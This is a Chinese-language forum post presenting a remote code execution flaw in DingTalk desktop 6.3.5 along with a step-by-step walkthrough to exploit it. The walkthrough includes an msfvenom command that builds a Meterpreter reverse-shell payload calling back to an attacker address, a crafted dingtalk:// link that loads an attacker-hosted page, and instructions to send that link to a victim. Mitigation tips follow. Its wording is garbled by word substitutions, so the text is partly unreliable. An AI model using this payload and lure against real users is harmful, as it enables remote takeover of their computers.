钉钉桌面端 6.3.5 版本远程代码执行漏洞

破绽描绘

钉钉(DingTalk)是中国抢先的智能挪动办公平台,由阿里巴巴集团开发,免费提供应一切中国企业,用于商务沟通和工作协同。钉钉桌面端 6.3.5 版本远程代码执行破绽攻击代码,受影响的钉钉版本允许远程攻击者经过钉钉预览 web 页面中的远程代码执行 (RCE) 破绽执行恣意代码。
 


 

破绽版本号

V6.3.5-Release.10278702  <=
 


 

破绽特征

攻击者发送的链接格式固定:

dingtalk:   //开头
Pc_slide=true    //结尾

当发现有人发送相似的链接时请慎重翻开。
 


 

破绽复现

POC已在GitHub上披露
https://github.com/crazy0x70/dingtalk-RCE

dingtalk://dingtalkclient/page/link?url=http://your_ip/dingding.html&pc_slide=true

 

复现过程

1.msf 生成shellcode

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.36.130 LPORT=8834 -e x86/shikata_ga_nai -f csharp

图片[1]-钉钉桌面端 6.3.5 版本远程代码执行漏洞-孤勇者社区

2.msf开启监听

图片[2]-钉钉桌面端 6.3.5 版本远程代码执行漏洞-孤勇者社区

3.将生成的shellcode交换原shellcode
需求交换的位置为

var shellcode=new Uint8Array()

4.开启web效劳,并上传poc文件,结构poc

图片[3]-钉钉桌面端 6.3.5 版本远程代码执行漏洞-孤勇者社区

Poc

dingtalk://dingtalkclient/page/link?url=http://your_ip/dingding.html&pc_slide=true

5.从钉钉发送poc给受害者

图片[4]-钉钉桌面端 6.3.5 版本远程代码执行漏洞-孤勇者社区

6.受害者点击即会触发破绽,在msf监听处上线。

图片[5]-钉钉桌面端 6.3.5 版本远程代码执行漏洞-孤勇者社区
 


 

处理方法

官网下载最新版本钉钉
https://page.dingtalk.com/wow/z/dingtalk/default/dddownload-index?from=zebra:offline

躲避措施
1. 提升平安认识,防止点击钉钉上发送来的不明链接。
2. 在收到衔接后应该认真察看链接能否为常见网站或常规方式。
3. 对接工作时记得和同时做好沟通。
 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞7赞赏 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片